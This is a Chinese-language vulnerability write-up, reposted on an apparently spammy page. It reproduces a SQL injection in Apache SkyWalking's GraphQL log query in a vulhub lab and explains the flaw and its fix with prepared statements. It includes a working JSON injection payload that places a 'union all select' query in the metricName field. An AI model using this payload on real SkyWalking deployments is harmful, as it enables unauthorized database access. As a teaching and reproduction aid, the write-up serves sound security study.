当前位置: 首页 > news >正文

深圳营销型网站建站衡水营销型网站建设

深圳营销型网站建站,衡水营销型网站建设,潍坊网站建设工作室,小米网站建设漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时#xff0c;通过GraphQL协议查询元数据时#xff0c;存在SQL注入漏洞#xff0c;该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参…漏洞概述 当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时通过GraphQL协议查询元数据时存在SQL注入漏洞该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。 环境搭建 拉取vulhub git clone https://github.com/vulhub/vulhub.git搭建镜像 cd /vulhub/skywalking/8.3.0-sqli docker-compose up -d访问8080端口 漏洞复现 在首页刷新即可抓到报文。 输入payload {query:query queryLogs($condition: LogQueryCondition) {queryLogs(condition: $condition) {totallogs {serviceIdserviceNameisErrorcontent}} } ,variables:{condition:{metricName:INFORMATION_SCHEMA.USERS union all select h2version())a where 1? or 1? or 1? --,endpointId:1,traceId:1,state:ALL,stateCode:1,paging:{pageSize:10}}} }查看返回结果 漏洞复现成功 漏洞原理 源码https://github.com/apache/skywalking/releases/tag/v8.3.0 graphql是skywalking的一种查询协议如果请求以下列JSON给出 {bookById(id: book-1){idnamepageCountauthor {firstNamelastName}} }则返回结果为 {bookById: {id:book-1,name:Harry Potter and the Philosophers Stone,pageCount:223,author: {firstName:Joanne,lastName:Rowling}} }通常graphql中会对对象类型进行定义 type Query {bookById(id: ID): Book }type Book {id: IDname: StringpageCount: Intauthor: Author }type Author {id: IDfirstName: StringlastName: String }此次产生漏洞的queryLogs为 oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls: (这里不知道为什么下载的源码中没有只能跑到github上看 oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java 采取了直接拼接的方式。 5、修复方法 修复后使用了占位符即预编译。
http://www.yutouwan.com/news/473553/

相关文章:

  • php免费网站源码做网站 你的出路在哪里
  • 确定建设电子网站的目的张雪峰谈网络工程专业
  • 做虚拟货币交易网站114网址大全
  • 公司网站建设的市场需求wordpress编程
  • 海宁公司做网站个人博客网站设计
  • 番禺区网站建设手机网站怎么优化
  • 上海做网站公司排名wordpress怎么改为中文
  • 广西中小企业网站建设免费域名申请地址
  • 网站外链收录很多 内链收录几个系统优化工具是什么软件
  • 网站制作是不是要一个后台电子商务网站设计的原则
  • 免费的旅游网站模板江苏省现代化示范校建设网站
  • 网站建设价类型东莞seo优化公司
  • 用frontpage做网站网站建设实训经验总结
  • 椒江网站建设578做网站哪里有学做ppt的网站
  • 优化前网站现状分析网站如何备份数据
  • 专业的外贸行业网站制作北京师大互联网公司排名
  • 太原做学校网站的公司网站空间 价格
  • 门户网站建设招标公告网站录入
  • 淘宝网站模板是什么做的展厅策划设计公司
  • 网站安全性怎么做网站怎么换服务器
  • 旅游前 做攻略有什么网站好用网页项目策划书模板
  • 怎么做网页制作网站模板wordpress也没
  • 网站建设程序流程公众号开发人员名单
  • 网站备案拍照背景无聊网站建设
  • 2017年做网站好难建立网站有怎么用途
  • 网站备案的幕布个人外贸网站
  • 舜元建设 集团 有限公司网站好的做外贸的网站
  • 什么叫网站收录网站开发文档教学
  • 90设计网站创建时间菏泽 做网站 多少钱
  • 网站设计制作费用开个网站多少钱一年